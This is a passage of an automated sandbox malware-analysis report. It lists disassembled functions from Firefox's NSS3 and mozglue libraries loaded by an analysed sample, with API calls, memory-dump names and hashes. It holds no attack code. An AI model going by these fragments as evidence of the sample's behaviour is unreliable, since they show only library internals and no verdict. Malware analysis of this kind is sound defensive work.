                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9709D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C970AC8
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9709D0: PR_vsmprintf.NSS3(?,?), ref: 6C970AE8
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9709D0: EnterCriticalSection.KERNEL32(?), ref: 6C970B19
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9709D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C970B48
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9709D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C970C76
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9709D0: PR_LogFlush.NSS3 ref: 6C970C7E
                                                                                                                                                                                                                                                                                        • PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6C892D22
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9709D0: OutputDebugStringA.KERNEL32(?), ref: 6C970B88
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9709D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C970C5D
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9709D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6C970C8D
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9709D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C970C9C
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9709D0: OutputDebugStringA.KERNEL32(?), ref: 6C970CD1
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9709D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C970CEC
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9709D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C970CFB
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9709D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C970D16
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9709D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6C970D26
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9709D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C970D35
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9709D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6C970D65
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9709D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6C970D70
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9709D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C970D90
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9709D0: free.MOZGLUE(00000000), ref: 6C970D99
                                                                                                                                                                                                                                                                                        • PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6C892D3B
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9709D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C970BAB
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9709D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C970BBA
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9709D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C970D7E
                                                                                                                                                                                                                                                                                        • PR_LogPrint.NSS3( pLabel = 0x%p,?), ref: 6C892D54
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9709D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C970BCB
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9709D0: EnterCriticalSection.KERNEL32(?), ref: 6C970BDE
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9709D0: OutputDebugStringA.KERNEL32(?), ref: 6C970C16
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468341392.000000006C7E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7E0000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468321043.000000006C7E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468742808.000000006C97F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468798495.000000006C9BE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468849903.000000006C9BF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468897034.000000006C9C0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468931608.000000006C9C5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c7e0000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: DebugOutputString$Printfflush$fwrite$CriticalEnterR_snprintfSection$CurrentExplodeFlushR_vsmprintfR_vsnprintfThreadTimefputcfreememcpystrlen
                                                                                                                                                                                                                                                                                        • String ID: pLabel = 0x%p$ pPin = 0x%p$ slotID = 0x%x$ ulPinLen = %d$C_InitToken
                                                                                                                                                                                                                                                                                        • API String ID: 420000887-1567254798
                                                                                                                                                                                                                                                                                        • Opcode ID: abfa0ea54e7c0641734ba5f755d4ccf20a27426eaf7ac5a84eb6c806587a6e5c
                                                                                                                                                                                                                                                                                        • Instruction ID: 0808c3eddc74664d34d60e4ba98c0b8202998c128ac403cf599e74f9f186b827
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: abfa0ea54e7c0641734ba5f755d4ccf20a27426eaf7ac5a84eb6c806587a6e5c
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CF21D375206148EFDB20AB5CDE8CE453BB5FB8231EF585820F50893632DB75CA58CB61
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C744480 Relevance: 16.8, APIs: 11, Instructions: 316COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: free$moz_xmalloc
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3009372454-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 031942892b6f47bc7411eff29daf7bd5b372693f1111935e3af3b1cbd4db0fc7
                                                                                                                                                                                                                                                                                        • Instruction ID: 99928f01a63bcd73c22bf665109ab4b8beccfa59778d082cc1e5a4e096c4f93e
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 031942892b6f47bc7411eff29daf7bd5b372693f1111935e3af3b1cbd4db0fc7
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F2B1E471A001508FDB18DE3DDA9476D77A6AF42328F188679E816DFF93D7309840BB82
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C8D0C60 Relevance: 16.7, APIs: 11, Instructions: 153memoryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • SECOID_GetAlgorithmTag_Util.NSS3(6C8D2C2A), ref: 6C8D0C81
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8BBE30: SECOID_FindOID_Util.NSS3(6C87311B,00000000,?,6C87311B,?), ref: 6C8BBE44
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8A8500: SECOID_GetAlgorithmTag_Util.NSS3(6C8A95DC,00000000,00000000,00000000,?,6C8A95DC,00000000,00000000,?,6C887F4A,00000000,?,00000000,00000000), ref: 6C8A8517
                                                                                                                                                                                                                                                                                        • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C8D0CC4
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8BFAB0: free.MOZGLUE(?,-00000001,?,?,6C85F673,00000000,00000000), ref: 6C8BFAC7
                                                                                                                                                                                                                                                                                        • SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C8D0CD5
                                                                                                                                                                                                                                                                                        • PORT_ZAlloc_Util.NSS3(0000101C), ref: 6C8D0D1D
                                                                                                                                                                                                                                                                                        • PK11_GetBlockSize.NSS3(-00000001,00000000), ref: 6C8D0D3B
                                                                                                                                                                                                                                                                                        • PK11_CreateContextBySymKey.NSS3(-00000001,00000104,?,00000000), ref: 6C8D0D7D
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(00000000), ref: 6C8D0DB5
                                                                                                                                                                                                                                                                                        • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C8D0DC1
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(00000000), ref: 6C8D0DF7
                                                                                                                                                                                                                                                                                        • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C8D0E05
                                                                                                                                                                                                                                                                                        • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C8D0E0F
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8A95C0: SECOID_FindOIDByTag_Util.NSS3(00000000,?,00000000,?,6C887F4A,00000000,?,00000000,00000000), ref: 6C8A95E0
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8A95C0: PK11_GetIVLength.NSS3(?,?,?,00000000,?,6C887F4A,00000000,?,00000000,00000000), ref: 6C8A95F5
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8A95C0: SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6C8A9609
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8A95C0: SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C8A961D
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8A95C0: PK11_GetInternalSlot.NSS3 ref: 6C8A970B
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8A95C0: PK11_FreeSymKey.NSS3(00000000), ref: 6C8A9756
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8A95C0: PK11_GetIVLength.NSS3(?), ref: 6C8A9767
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8A95C0: SECITEM_DupItem_Util.NSS3(00000000), ref: 6C8A977E
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8A95C0: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C8A978E
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468341392.000000006C7E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7E0000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468321043.000000006C7E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468742808.000000006C97F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468798495.000000006C9BE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468849903.000000006C9BF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468897034.000000006C9C0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468931608.000000006C9C5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c7e0000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Util$K11_$Tag_$Item_$FindZfree$Algorithmfree$ContextLength$Alloc_BlockCreateDestroyFreeInternalSizeSlot
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3136566230-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 34ed45d60cd1b10d5e875831be0f9d0ae96441bdfed661a03938c3d478e021e4
                                                                                                                                                                                                                                                                                        • Instruction ID: ea06dd1c76e48269f0a3f44f3512a2f4d64ccb66c9b5876122f089f679f97681
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 34ed45d60cd1b10d5e875831be0f9d0ae96441bdfed661a03938c3d478e021e4
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 624105B5901205ABEB209F68DE41BAF7674EF0430DF110935E915A7742E735FA14CBE2
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C7AAC20 Relevance: 16.6, APIs: 11, Instructions: 92fileCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: File$View$CloseHandle$CreateInfoSystemUnmap$Mapping
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1192971331-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 3bd7d3854a1cf44dc51e05bead8b395cb2fd6921974af83898b6f6a05ff2c3f3
                                                                                                                                                                                                                                                                                        • Instruction ID: 157adefc775e27296e88900c96c67c7ca89d7e00ebee9775507b5663022f01b8
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3bd7d3854a1cf44dc51e05bead8b395cb2fd6921974af83898b6f6a05ff2c3f3
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7E3162B19047058FDB00AF78D64966EBBF4FF85715F018A3DE98587311EB70A589CB82
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C896C40 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 87COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • PR_LogPrint.NSS3(C_DigestInit), ref: 6C896C66
                                                                                                                                                                                                                                                                                        • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C896C94
                                                                                                                                                                                                                                                                                        • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C896CA3
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C97D930: PL_strncpyz.NSS3(?,?,?), ref: 6C97D963
                                                                                                                                                                                                                                                                                        • PR_LogPrint.NSS3(?,00000000), ref: 6C896CB9
                                                                                                                                                                                                                                                                                        • PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6C896CD5
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468341392.000000006C7E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7E0000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468321043.000000006C7E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468742808.000000006C97F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468798495.000000006C9BE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468849903.000000006C9BF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468897034.000000006C9C0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468931608.000000006C9C5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c7e0000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Print$L_strncpyz$L_strcatn
                                                                                                                                                                                                                                                                                        • String ID: hSession = 0x%x$ pMechanism = 0x%p$ (CK_INVALID_HANDLE)$C_DigestInit
                                                                                                                                                                                                                                                                                        • API String ID: 1003633598-3690128261
                                                                                                                                                                                                                                                                                        • Opcode ID: 1f84bfa5708652f5767c497742544d795a67fc026d98a4c410b461a6006de96f
                                                                                                                                                                                                                                                                                        • Instruction ID: 89c8d2282f6dd0dbca6b8a1aecddafb28ddf69040e4063abbb41c2a932c7eaf2
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1f84bfa5708652f5767c497742544d795a67fc026d98a4c410b461a6006de96f
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9D2136706061049BCB609B1D9E88B9A37B5EB8231DF594835F40997B11DB31DA08CBE2
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C884CA0 Relevance: 15.1, APIs: 10, Instructions: 142COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • TlsGetValue.KERNEL32(?,00000000,00000000,?,6C88AB7F,?,00000000,?), ref: 6C884CB4
                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(0000001C,?,6C88AB7F,?,00000000,?), ref: 6C884CC8
                                                                                                                                                                                                                                                                                        • TlsGetValue.KERNEL32(?,6C88AB7F,?,00000000,?), ref: 6C884CE0
                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,6C88AB7F,?,00000000,?), ref: 6C884CF4
                                                                                                                                                                                                                                                                                        • PL_HashTableLookup.NSS3(?,?,?,6C88AB7F,?,00000000,?), ref: 6C884D03
                                                                                                                                                                                                                                                                                        • PR_Unlock.NSS3(?,00000000,?), ref: 6C884D10
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C90DD70: TlsGetValue.KERNEL32 ref: 6C90DD8C
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C90DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C90DDB4
                                                                                                                                                                                                                                                                                        • PR_Now.NSS3(?,00000000,?), ref: 6C884D26
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C929DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C970A27), ref: 6C929DC6
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C929DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C970A27), ref: 6C929DD1
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C929DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C929DED
                                                                                                                                                                                                                                                                                        • PR_Unlock.NSS3(?,?,00000000,?), ref: 6C884D98
                                                                                                                                                                                                                                                                                        • PR_Unlock.NSS3(?,?,?,00000000,?), ref: 6C884DDA
                                                                                                                                                                                                                                                                                        • PR_Unlock.NSS3(?,?,?,?,00000000,?), ref: 6C884E02
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468341392.000000006C7E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7E0000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468321043.000000006C7E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468742808.000000006C97F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468798495.000000006C9BE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468849903.000000006C9BF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468897034.000000006C9C0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468931608.000000006C9C5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c7e0000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Unlock$CriticalSectionTimeValue$EnterSystem$FileHashLeaveLookupTableUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 4032354334-0
                                                                                                                                                                                                                                                                                        • Opcode ID: f5df38abe5f83c7b7bf7d81147c706790b3625842e8238d7cbf77024a2f4637a
                                                                                                                                                                                                                                                                                        • Instruction ID: d459af512c8c6733a46c8cc526fde26cbb0f37d1771b93161243abab77ad5d79
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f5df38abe5f83c7b7bf7d81147c706790b3625842e8238d7cbf77024a2f4637a
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4541C7B7A00205ABDB219F28E95096A77BCEF95219F154970EC0887F12FB31E954C7A1
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C754C00 Relevance: 13.9, APIs: 8, Strings: 1, Instructions: 421COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(6C7CE7DC), ref: 6C754C2F
                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6C7CE7DC), ref: 6C754C82
                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(6C7CE7DC), ref: 6C754C89
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CriticalSection$Enter$Leave
                                                                                                                                                                                                                                                                                        • String ID: MOZ_RELEASE_ASSERT(mNode)
                                                                                                                                                                                                                                                                                        • API String ID: 2801635615-1351931279
                                                                                                                                                                                                                                                                                        • Opcode ID: fa42908185007601dddfb36ab246c938a11ff9ee35da7f2e4613a712c26a5af3
                                                                                                                                                                                                                                                                                        • Instruction ID: 1bd31c5b6a0c70b990147a7f3f26a5e0f7a36f68bb00153132addc282fc7d586
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fa42908185007601dddfb36ab246c938a11ff9ee35da7f2e4613a712c26a5af3
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 84F1D0317057028FD718CF29C695715BBE1AF86728F68C66CE56A8BAD4CF31D821CB81
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C8ACC70 Relevance: 13.8, APIs: 9, Instructions: 313COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • memcpy.VCRUNTIME140(?,00000100,?), ref: 6C8ACD08
                                                                                                                                                                                                                                                                                        • PK11_DoesMechanism.NSS3(?,?), ref: 6C8ACE16
                                                                                                                                                                                                                                                                                        • PR_SetError.NSS3(00000000,00000000), ref: 6C8AD079
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C90C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C90C2BF
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468341392.000000006C7E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7E0000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468321043.000000006C7E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468742808.000000006C97F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468798495.000000006C9BE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468849903.000000006C9BF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468897034.000000006C9C0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468931608.000000006C9C5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c7e0000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: DoesErrorK11_MechanismValuememcpy
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1351604052-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 08d83c4832cb83d4312ae8a7051b907875e82480d7d4c6ffb70a09ef1d07c13d
                                                                                                                                                                                                                                                                                        • Instruction ID: 2dddc939f073587e7bab78af0ca14d8048ed0a1b7395780a1c6d9c7715e73ad2
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 08d83c4832cb83d4312ae8a7051b907875e82480d7d4c6ffb70a09ef1d07c13d
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 67C190B1A002199FDB20CF69CD80BDAB7B4BB48308F1445A9D948A7741E775EE96CF90
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C799D00 Relevance: 13.7, APIs: 9, Instructions: 178timeCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
